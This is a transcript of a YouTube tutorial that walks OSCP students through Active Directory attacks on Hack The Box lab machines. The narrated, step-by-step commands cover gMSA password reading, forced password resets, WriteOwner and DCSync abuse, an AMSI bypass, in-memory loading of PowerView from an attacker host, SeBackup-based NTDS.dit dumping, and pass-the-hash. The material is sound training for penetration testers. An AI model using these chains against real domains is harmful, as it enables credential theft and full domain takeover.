What's good, YouTube? This is Dan Main from Unknown Artists Cyber Threat Division. Today, I'm going to tell you about 10 things that you need to know about Active Directory. We're going to go over ReadGMSAPassword, ForceChangePassword, GenericWrite, GenericAll, AllExtendedRights, Right Owner. We're going to go through ReadGMSAPassword. We're going to go through Get Changes All, DC Sync, all of the things that you need to see in BloodHound. We'll have some BloodHound visuals, so that's always good because BloodHound is a mess and it can be very overwhelming if you don't have a methodology to walk through. We're also going to get acquainted with PowerView and the things that it can do, and we're going to discover some privileges with whoami/priv to exploit some SeBackup permissions and dump NTDS.dit and System Hive. So all of the things that I know, we're going to experiment with those, and I'm going to try to keep more of a OSCP format, meaning that instead of logging in with SMB client or a restricted shell, we're going to actually log in a proper way and dump whoami IP config and the flag just to get our reps in. So I hope you enjoy the video. This video is full of information, so I would suggest that you sit somewhere and take notes. If you're in the line at Starbucks or doing something else, you know, you can listen. I appreciate it, but you want to get the full effect of this video and pay close attention. Otherwise, it might just be a waste. We all want to be serious. We all want to get serious and get our OSCP and then go on the OSEP. And this video would definitely help you. So I'm going to stop talking. Let's get right into the technical information. Let's go. So what you see in front of you is the output of BloodHound, and this box is search on HacktheBox, and it's a very good box to practice on. Get the write up and go through the motions. I guarantee you won't be sorry, because there's a lot of things that you can learn from what's going on. But coming in at number 10 is ReadGMSAPassword. We're hunting for that permission. We're hunting to take advantage of that permission. So the first thing that I'll do is search for a user. So we compromised the user that left her password in an Excel file, and it was super easy for us to access. We had to crack it, but I'm not going over any of that here. I'm going to stick to Active Directory. So her name is Sierra Fry, and we'll just search her and click there. Now, when you search on your end, it'll come just like that. What you want to do is right click it and click mark user as owned. So it just helps you so that you don't get confused, or so that she doesn't blend in with everyone else. The next thing you want to do is click analysis, and you want to come down to shortest paths. And once you do that, for me, I don't try to read into these too much. I know what they are, but I don't, try to read into them too much. I just click one at a time to see if any one of them have, any of the paths have any permissions that are interesting to me. Again, just to reiterate, right now we're looking for Get GMSAPassword. She is a member of, nope, that's not her. It's the skull here. She is a member of Birmingham-ITSec, which is a member of ITSec by search HTTP. And that group can PS remote into research.search.htb, which is the box that we're on. So that's pretty useless to us. We already kind of know that. So we'll move on. Kerberoastable users. I'm not really looking to Kerberoast anything, but there may be a chance that could be beneficial to us. However, we don't see anything there, and we'll keep going. Shortest paths to domain admin from Kerberoastable users, same result there. So we'll keep moving forward. Shortest paths from own principals. We'll click that and click search.htb and then Sierra Fry, and right off the bat we see ReadGMSAPassword. So This is one of the easiest wins you can get in Active Directory. Just to explain what's going on, GenericWrite is a member of this group. Who is a member of this group? And then anyone in this group can read the GMSA password for COVID.search.htb. If we click that, we'll see that there is a canonical name of BIR-ADFS.GMSA. We definitely want to compromise the user, and that's what we're going to do starting now. So I'm going to click back to my PowerShell access that I have for GenericWrite, and I've timed out, done this box a few times. Username here, password here, research is the computer that we're on, and this is basically what we saw earlier where it said GenericWrite can PS remote into research. Just to get you a little bit more familiar with what's going on, we go back up here. This is exactly what we're doing in a nutshell. Technically, it's not PS remoting. We're actually, how do you put it? We are actually in a PS session, so to speak. But I mean, it's all the same thing when it comes to WinRM. Just something to know, just something nice to know. And then I already have sessions running. I'm just gonna click into one of my sessions, and here I am. So the first thing that we want to do is my notes. I'm gonna move my notes over here, out of your way, so you can actually see the screen. Let me see. Just give me 1 second, and we'll continue. So the first thing we'll do is type GMSA, which is a generic variable, and we'll type get AD service account dash identity BIR-ADFS GMSA. Just to reiterate, that is the username for the account we want to compromise. Dash properties MSDS dash managed password, and we want to make sure we spell everything correctly. And then once you type that, you should have your GMSA variable looking like that. To keep moving, MP equals GMSA MSDS managed password, and then we'll do MP. So I'm going to stop right here and explain what's going on with these two commands. Now, technically, you don't really have to understand fully what's going on with the commands. You just need to know the commands to compromise the user, but it's nice to know what's going on, right? So with that first command, I'm just going to run it again just so you can see it, because I kind of lost it there. With this command, I'm taking this object with this argument and accessing this property. And so you get GMSA, you get this result. Now in PowerShell, since it's accessing it as an object, it's just getting all of this. But when you access it as an object in the .NET way, which was this command, you can strip off this property. And so that's what we did there. So we basically access the property in the PowerShell way and then access the property in the .NET way. It is what it is. It's just one of those things about PowerShell. It would probably make more sense in your brain if you could just access this sole property with this command, but again, it is what it is. So that's what we did with those first two commands. The third command, we want to take this property and we want to convert it from a blob, which is just right now, or it's just a bunch of numbers right now. So convert from, and by the way, that is the password, AD managed password blob, and then just MP. And then we'll just look at MP1. And then so now you see, this is the password. Go figure. So now we want to access this property in the .NET way again. So what we'll do is we'll say passwd equals mp1 dot current pass, or in this case insensitive, so it's case insensitive, so it's fine. And so we type passwd, we have that password. We want to go ahead and set our username to a variable as well, so that it is easier on us, GMSA. And in any group managed service accounts and the accounts that come default with Windows, some of them have a $sign at the end, and this one definitely does. You'll see it more as you get more experience with Windows. And then boom. Next, we need to go ahead and set a variable called secpass equals convert to secure string, and we want to convert that password as plain text. And you'll see this command again, force. And then finally, we want to do cred equals new object, system management, automation, PS credential, and then it is just user, and then it's just sec pass. And essentially what we have done is we've taken this password and we created a PS credential. So now we can basically log in using this credential super easily. So that is number 10. We've just read the GMSA password, and from there we have credentials so that we can use it to log in. It's just how you do it. It's PowerShell. It's Active Directory. You got to get used to it. Coming in at number 9. The next one we want to hunt for is GenericAll. And I'll show you that in BloodHound. Let's go back to own principles. So GenericAll here. Now that we've owned this, we could just mark this user as owned. We have GenericAll over Tristan Davies, who is a member of administrators, which is very good for us. So as a final nail in the coffin, we could say invoke command computer name 127.0.0.1. So invoke command is a command you can use to run a command remotely on another box. But as you see, I'm invoking a command into localhost. So why would I do that? Damn, man, why would you do that? Like, what are you doing right now? Bro, hold up. The answer to that question is I have to invoke command because I'm using another user's credentials. There's other ways I believe that I could do it, but to me, this makes the most sense. And then this is also the way that they did it in the write-up, which is what I'm following. So yes. So script block, you don't really need script block here, but it's proper to put it here. It'll just automatically know where the script block is. But yeah, just do it like you see it, and then as you get used to PowerShell, you'll be like, hey, I didn't even need to type script block because it already knew where my script block was. Tristan Davies, reset new passwords. So now we're about to set Tristan Davies a new password. And so we're going to type that same command we typed for GMSA. This command, secure string as plain text, password 1234. And it just set it like that, like the write-up. And we'll type force, and then we'll close the parentheses, close the code block, and then finally we'll use those credentials that we created at the top. which is that password, and that's username. Cred. It's running, and voila. So all we have to do now is go over to a Kali terminal and type WMI exec. It's already there as you see it. Search Tristan Davies with our password 1234 bang, and then search, excuse the vibrations there, .htb, enter, and we are good. Who am I? Search.Tristan.Davies, and then we type ipconfig, and then we type C users administrator desktop root.txt. So this box is object from HacktheBox, and currently we have compromised Oliver as a user, and Oliver has ForceChangePassword over Smith, which leads us to number 8, which is ForceChangePassword. Anytime we get into BloodHound and the output, we want to hunt for, in addition to our ReadGMSAPassword and our GenericWrite, our GenericAll, we want to hunt for ForceChangePassword. And so I'll show you exactly how to exploit that, which leads me to number 7, which is PowerView. So I need to log in with EvilWinRM, and I need to cd into program data, and then I need to upload home Kali work HTTP object PowerView.ps1. And then once I do that, /PowerView.ps1 to source my PS1 file. Awesome. Now we will compromise Smith's password. New pass equals to convert to secure string. And then we'll just password 1234 as plain text, and then force. And once we do that, we can just use one of the PowerView commands, set domain user password identity Smith count password new pass. And that's it. We can now exit, clear EvilWinRM I 10 129 71 240 Smith P password 1234, and we're in. So Smith has GenericWrite over Maria, which is no bueno for the blue side of things, but very bueno for us. And so we can take advantage of that in several ways. First, cd into C program data again. And then we need to /PowerView.ps1. And next we need to echo ls users Maria desktop. So we need to see what Maria has lying around. Maybe she has some passwords that are plain text or anything like that. So we need to just see if we could just enumerate a bit. So we can just do program data out here, and then we could pass that into cmd.ps1. And then once we do that, we can do set domain object, which is another PowerView command. Identity Maria set at script path equals C program data cmd ps1, enter. And so if we do an ls, we should, what did I do wrong there? Oh, there it is. So we have out. And so if we type out, we'll see that Maria has engines.xls on her desktop. Now, in a realistic scenario, we would enumerate many directories other than desktop to see what she has. But for the sake of time, we knew that there was something on her desktop, so we just aimed for a desktop. Hope that made sense. So we'll move on. The next thing that we need to do is put engines.xls in a place that we could access it. So echo copy C users Maria desktop engines.xls, C program data engines.xls, and then we will pass that to cmd.ps1 because we don't need the original anymore. And then we can just do the set domain object command again. And if we ls, we see that we have engines in our program data folder, directory, etc. So now we can just download C program data engines.xls into home Kali work HTTP object in engines.xls, and we have that. So the next thing that we can do is open up a Firefox, go to Google Sheets, because I don't feel like downloading Open Office. And we have 3 passwords here. So, I mean, I guess we did good there. So what we can do here is we could copy these and then close our Firefox, go back into a Kali, and we don't need this session anymore. So we can just say thank you WinRM, evil WinRM. And then clear, we are in the directory already. So we could just say vim Maria pass, paste those in, WQ bang. And we can do a password spray with crack map exec. WinRM 10.129 71.240 U Maria P Maria pass. Now this is going to take some time to run, so I'm going to pause the video until it comes back. And so we have our results after about 2 minutes, and we see that this password works. So we need to copy this, and we need to evil WinRM I 10.129 71.240. Thank you, Maria P, that password, and that should be it. Awesome. So coming in at number 6 is right owner. So Maria has right owner permissions over the domain admins group, and we can tell she does through invoke ACL scanner resolve GUIDs identity reference name like Maria. And I missed a crucial step there. You actually have to PowerView, source PowerView every time. And so I know what you're probably thinking. You're probably thinking, how do you run through your methodologies well enough to capture all of this at once? with things like invoke ACL scanner, you should see something that leads you toward Maria having right owner in BloodHound. But in case you don't, this is a second way to get after that. And as you see here, domain admins is the object that we're talking about, right owner, and then identity reference name is Maria. All these big words basically means that she has right owner access over the domain admins. So long story short, right owner is very important to you in owning the domain. So there are a few more commands we need to run, which are we need to run set domain object owner identity domain admins with the owner Maria, and then we need to type add domain object ACL target identity domain admins principal identity Maria writes all. And so after I made Maria the owner, I gave Maria all rights. It's just how it works. And then lastly, I can add domain group member identity domain admins members Maria. And so now I can check to make sure that that went well. Net user, net group domain admins. And as you see, Maria is there. So we need to log off and then log back on to give it time to work. And now we can run ipconfig who am I, and then type C users administrator root desktop root.txt. Also, so this box is Blackfield from HacktheBox, and coming in at number 5 is SeBackup. So this user SeBackup has SeBackup permissions, and we can confirm that with my priv, one of our enumeration commands that we should run when we're trying to get PrivEsc on a Windows machine. And you see it here, SeBackup privilege. So any user with SeBackup privilege, meaning any attacker that has compromised the user with SeBackup privilege, can run something called robocopy. So robocopy will allow you to pretty much access any file that you want to, even if you don't have permissions to access it. And the initial reason why you would want to do this is so that you can bag things up like it says. So as we see this, let's see if I ran that correctly. So yeah. So if we run a get child item C, or our root directory, basically, we have accessed notes and root.txt. Now, just kind of a quick hint or a quick tip. If you ever see SeBackup on a box and you just ran this command, you instantly have root.txt. However, for this box, we get, no. We need to cd here. Actual root.txt. Okay, so I didn't plan on that happening. In the original in the original creation of the box, you don't have access to root.txt. So even though we have access to it, we're going to pretend that we don't have access to it and we're going to move on. So we don't have, air quotes, access to root.txt because it was encrypted. So we're just going to read the notes.txt because there's another way to compromise the box, which is the intended way that I want to show you. And because the audit report is sensitive, I have encrypted it on the desktop. Fortunately, maybe they did something to the box and it's not really working like we think. So basically, we need to get into the administrator context. And if we can do this, we can abuse SeBackup and SE restore privileges. And as we do that, we can dump that Active Directory database, and then we could pass the hash to get a shell as the administrator. But first, we need to install and configure a Samba server with authentication. So I'll basically walk through how to do that. This is the way that I read from the walkthrough, so we're going to work with it. So net user, okay, and then this is me, 10.10.14.24, SMB user, SMB user, and then this is his password. And it says that something's wrong there. Let me see what I messed up. Is there space there? Yeah. What did I do? Syntax of the command is let me see. I actually haven't done net user in a long time. Net user, maybe K needs a slash like that. Doesn't like that. Get rid of one of these. It's not telling me the syntax. Net user is, it says username. Okay, so it says net user, username, password. Why am I using net user? That can't be right. It's gotta be like net share. Oh, net use. I'm tripping. Net use. And it still says nope. Oh, maybe it is this thing that I added. The specified network password is incorrect. I don't think I named it that. I think I actually. So I'm gonna pause it because I'm gonna I'm gonna expose a password of mine. I just thought about it. I set it as a password that I actually use. So yeah. All right, I'm gonna clear the screen in a minute, but just know that it's net use K and then all it is user SMB user and then the password here. So next up is number 4. So coming in at number 4 is NTDS.dit. So we want to back up the NTDS.dit folder with WB admin. So we can do that in our WinRM shell with echo tech y wb admin start backup targets 10 10 14 24 /SMB, and then tech include C Windows NTDS. It says that it is invalid because I typed it incorrectly. Okay, so the backup successfully completed, and we can retrieve the version of the backup. So we'll just say wp admin get versions. Here we are. Network share labeled SMB. We can now restore the NTDS file specifying the backup version. So we'll just say echo y wb admin start recovery version 7 16 22 0 7 43 item type file items equals C Windows NTDS.dit, and then recovery targets C, and then we'll add not restore ACL. And then we'll wait a minute until this finishes. And so now that that has finished, we need to export the system hive and transfer that to our local machine. So what we'll do is we'll type registry save sklm system c system.hive, and then we'll copy NTDS.dit to 10 10 14 24 /SMB /NTDS.dit, and then we'll copy system hive 10 10 14 24 SMB system hive. Both worked. Awesome. Now we can do away with our evil WinRM, and let me see if I have not. Man, locate secrets dump.py. So we're going to use this one. So now we can say, well, first, before we use that, we need to enter our temp folder to get our NTDS.dit, our secrets dump. And so now we can say secrets dump .py NTDS.dit system hive, and then local. Oh yeah, all secrets dump plus wherever your in packet folder is, it should be in the same place. Scrolling with me right now. Locate secrets dump, do that again, and then all of this. Boom. Those are all hashes that we can use. but we're only interested in the domain administrator hash. So what we'll do is we'll scroll up, keep scrolling. But imagine, you know, if an APT did this, I mean, it's curtains, right? You got it all. So this is the hash that, let's make sure that it's not default or anything like that or anything crazy. So we have DC01 and administrator. I'm going to use the administrator one. So I can just get this back end here. And I'm pretty sure wmyexec is in this examples folder. So it's wmyexec. I even still got it in there. Hashes. And then I can leave off the first part, or I think I can. Let's see how it works. That is not the hash. I don't know where I got that from. This is the hash. I don't know. I don't even know what that is, but we'll paste that in, and then we can just say administrator at, and I am blanking on the 10, 129, 71, 242. Sweet. Who am I? ipconfig and type C users administrate desktop root.txt. So this next box that we'll do is called Forest from HacktheBox. In this context, we have owned the user service alfresco. It is a service account, and that leads us to number 3, which we're getting 2 for the price of 1, which is account operators and write discretionary access list. So account operators can, according to the write-up, create and modify users and add them to non-protected groups. So that is good for us. So when we think about non-protected groups, we'll look through the BloodHound output. So that's what we'll do here. So if we're talking about non-protected groups, the first thing that we need to do is left click alfresco service alfresco and click unrolled group membership. And this is pretty ugly. Let's change the layout. So yep. We're gonna go through all of these groups, and we confirm that he is an account operator here, just to get reps on looking through this thing. This service account is a member of this account, which is a member of this account, which is a member of this account. Now, this is realistic because you can get scope creep. And, you know, if you have a Active Directory domain up for a while, you'll eventually get this. So this is one of the more realistic boxes in that account. But back to the subject at hand, he is an account operator. So we can add ourselves to non-protected groups. If we were to look at what constitutes a non-protected group, honestly, I don't know. So when I first did this box, let's go to, which one do I want? High value targets, HTTP.local. When I first did this box, I didn't know what a unprotected group was. So I immediately went for administrators. I'll tell you right now, that skip you the trouble, so that you can skip the trouble. Administrators is protected. And a few of these are not weren't really relevant to me as I looked at the description. He's already pretty powerful being in account operators, so we can do things there, but we need to give ourselves just a bit more permissions so that we could finally own this domain. So just backtracking a little bit, to find such a group, you just go through all the groups to see which ones are protected and which ones are not. More than likely, I guess, now that I'm looking at the output, the diamond probably means protected. I know it means high value, but it probably also means protected. I don't know, go figure. But I did it the hard way, and I tried to add them to every privileged group I can think of, and I finally was able to add him here. So the key methodology to take away from this is understand what non-protected means and protected means if you have account operator access. So yes, this is the group that we want to target. So the first thing that we need to do is use our account operator group privileges. So we'll go back to Kali and do that. We need to log in as Alfresco Evil WinRM, and let's get the IP address. .95 210. User is SVC Alfresco, and then password is service, like that. And so we're in. Again, just to remind you, we have account operator privileges, so we can type net user, we'll take domain, then we'll give him our super secret password, and then we'll add domain. So this is how you would create a net user, not just in a pen testing or a malicious standpoint, from a malicious standpoint or pen testing standpoint. You do that if you were a regular IT person. This is how you do it. And you could do this at home, by the way. Net group is next, and we want to add him to that group that we saw, exchange Windows permissions. And just a reminder, we're adding him to this group and not a better group, because this one is not protected, yet it is very privileged. So we'll just add there. And finally, we need remote management, basically all the useful stuff. So add him to remote management users, domain add. So basically we're doing all of this so that we can dump creds, and we'll do that using DC sync and secrets dump. The next thing we need to do is type bypass AMSI, and just so that you know what this is one of those things that's very necessary, which is why it is number 2 on our list. If you don't bypass AMSI, in many cases, Windows will reject a lot of your malware. It will reject a lot of your PowerView. So essentially, you're just disabling Windows Defender here. I will tell you right now, just as a side tip or interesting thing, Windows has advanced to defeat bypass AMSI. So you just have to be aware that if you are a pen tester, there you have to find another way around. And if you're taking the OSCP or the OSEP, bypass AMSI should work. And if it doesn't work, there's probably another way. So just keep those things in mind. It's not infallible. Just know that. So I want to use a new tool that I made, and I call it Commander. Essentially what I did was I gave myself a way to not have to memorize this long notorious command here. We just do that. And also have a BloodHound version of this. I don't know if you saw it earlier. This is the BloodHound version. So I just, I know you probably saying I could just go through and just memorize this, but I don't, my brain just doesn't work like that. So, because I have to remember a lot of commands, I would rather just put them into a script and let the script make sure that I don't make any typos. So that's just, and I'll do a video on making little tools to make your life easier for the OSCP. But that's just kind of a preview to the next video. We'll do a little bit more than that. Going back to the topic at hand, let us take this, copy it. And before we paste it here, we need to start a web server in a place that has PowerView. A PowerView, not in there. Object definitely has it. Yes. So we need to start Python HTTP server. And then now, we'll try to run it. Unable to connect to the remote server. Oh, because I got the IP address wrong, dude. Woo. I don't know why I always do that. It is actually 10, 10, 14, 24. And then I can just copy this out and then paste it here. And then now it should run. Still unable to connect. Oh, because I don't have anything running. Now it should connect for me here. And so the good thing about IEX is it won't download this as it's saying. It will retrieve it and run it. So this won't be present on the box. It'll pretty much execute in memory. So not downloading in a traditional sense. So now that PowerView is enabled, we can move on with the privilege escalation chain. We can go straight to pass equals to convert to secure string password 1234 plain as plain force, and then cred equals new object system management automation. Here's credential HTTP damn main pass. That worked. And then add object ACL is from PowerView. So this is principal identity, which is me. Credential, nope, you do it like that. Credential, cred, and then rights. I want DC sync rights. That should work. Did I mess up anything? Nope, I didn't. That's good. So once that is done, we can say thank you to our evil WinRM shell. We can locate secrets dump.py, and we can use this one, and we can just say http/damn main at 10:10. Nope, it's 10:11 actually, right? Nope, 10:129 129 95.210, and we can push enter. Password is BASSWRD 1234 bang. It said access denied, but we still got all of the hashes anyway. I don't understand what's going on there. Might need to run it as sudo. Regardless, we still have what we want, so we're not going to trip on that. The last thing we need to do is basically in this folder we also have ps exec. .py, and then we just do administrator at cb.local. I don't think I have it saved in as hdb.local. So we just need to actually go to the IP 10.129.95.210, and then we need to do hash with the ES, and then get this administrator hash. We need both sides for this one, and that should work. Push enter, and we are in. So you just say, who am I? ipconfig, and type C users administrator desktop root.txt. All right, so now we're going to do the box sauna from HacktheBox, and this is a bonus to number 1, which is get changes all. It is a bonus because it relates to DC sync as well. So with get changes all, we'll hunt this as well when we are looking through Active Directory and all the things. So in this context, I have owned the user's service loan manager at egotisticalbank.local. So I'm going to mark this user as owned. And once I do this, I can first check his groups. Oh, it says service. So that's not right. I can check his groups. So we can unroll group membership, and we can go through all of these groups and Google them to see if they have any significance. Authenticated users, everyone. Nothing too special from the groups. So we can kind of check that off our list and say we check that. The next step is to walk through the shortest paths and see what we can get. So shortest path to unconstrained delegation. Are we still there? Yep. We have WriteDACL on domain admins, which is sweet. And we have WriteDACL on enterprise admins, which is sweet. Wait a minute. I think I just messed something up. Yeah, actually we don't. I thought that was a skull, but that is actually administrator. So we have nothing there. hdb.local. Nothing there. So it's not curve roastable. Nothing curve roastable. Shortest path to own principles. Wow, nothing there. Wow, nothing there. I was expecting a little something. Nothing there. Nothing there. Ooh, this is crazy here. Oh, losing control of what I'm doing. Okay, I think this comes from, yep, this is old. I don't want service alfresco. I want this guy. Okay, so I need to watch what I'm clicking because I need to be clicking this domain. Actually, just clicking everything. It's a bad habit. Egotisticalbank.local. We have all of this stuff. I don't see my own user. Oh, here we go. He's right here. So we have account operators has GenericAll on the service loan manager, and I can PS remote into sauna.egotistical.bank slash, was that a slash? A dash bank.local. And that is really no good to me. So I'm going to continue to look. Egotistical bank. Let's continue to look. key enterprise. All right, so I don't see anything in here, so we can cross out shortest path, cover roastable. I'm not looking to cover roast anything. There's nothing in, oh, there's service alfresco again. Don't need him because that's a different domain. So we'll move up the chain now to dangerous rights. And I think we got something here. So let us focus. Let's see if we could relay this out. That is not helpful. Okay, I guess you can tell what's going on. It's just little cattywampus there. So service loan manager has get changes and get changes all to egotistical dash bank that dot local. And we know from, if we did the box, we know that that is pretty much the domain. So in essence, we have get changes all on the domain. What does that mean? That means that we can PrivEsc using DC sync and pass the hash. So all in all, there's a few terms that go with DC sync. Get changes all is one of those. Let me see. Let me go to my notes just to make sure that I don't steer you wrong here. So get changes all is one of them. Another one is, let me just make sure that I'm good here. Okay, I can't find my notes. But another one is replication. Replication is another one. Where are my notes? DA notes. It's not in here. Windows, man. I swear. But yes, replication rights. So let me start again. So replication rights, you're looking for replication rights. And if you want to experiment more with that, you can do the box sizzle from HacktheBox. And you're looking for get changes all. That works with DC sync. And then you're also looking for, what was the other one that I did? You're also looking for allow to delegate. So those are the three permissions that you should be looking for. Again, we found get changes all. So what we can do now is we can go to our Kali. We can close one of these, collapse subterminal, and we can run our secrets.py command, or secrets.dump.py command. So I think I've already ran it a few times, but secrets.dump.py. We want to use this one from Impacket. And then we want to say egotistical /bank /service loan manager, or MGR, at the IP, which is, give me 1 second, 10.129.95.180. And then we want to do a dash just DC user to slim down the list, and then administrator. So I didn't do this in the first few boxes, but you can do this as well. Paste that from the write-up, and that should work. So we have administrator. We have 3 administrators actually, but we're going to use this one actually. So what we can do now that we pretty much own the place with our cred dump is we could copy that, but we don't want secrets dump. We want PS exec this time. .py egotistical bank .local /administrator at 10 129 95 180. Then we want to do dash hashes, and then we can just take this whole thing. Oh, I think I got lost. Okay, we can take this whole thing here and paste clipboard. And there we are. So we can do who am I, IP config, and then we can do our type C users administrators desktop root.text. And it says, why do I always do that? Type C users administrator desktop root.text. And so there we are. There is our screenshot. So all in all, I hope you enjoyed and learned from this list. Comment if you don't understand anything, obviously, and I'll help you out with that. But yeah, this is probably the most complete rundown I've ever done, and I hope you liked it. Again, please like and subscribe. Dan Main, I'm out. Peace.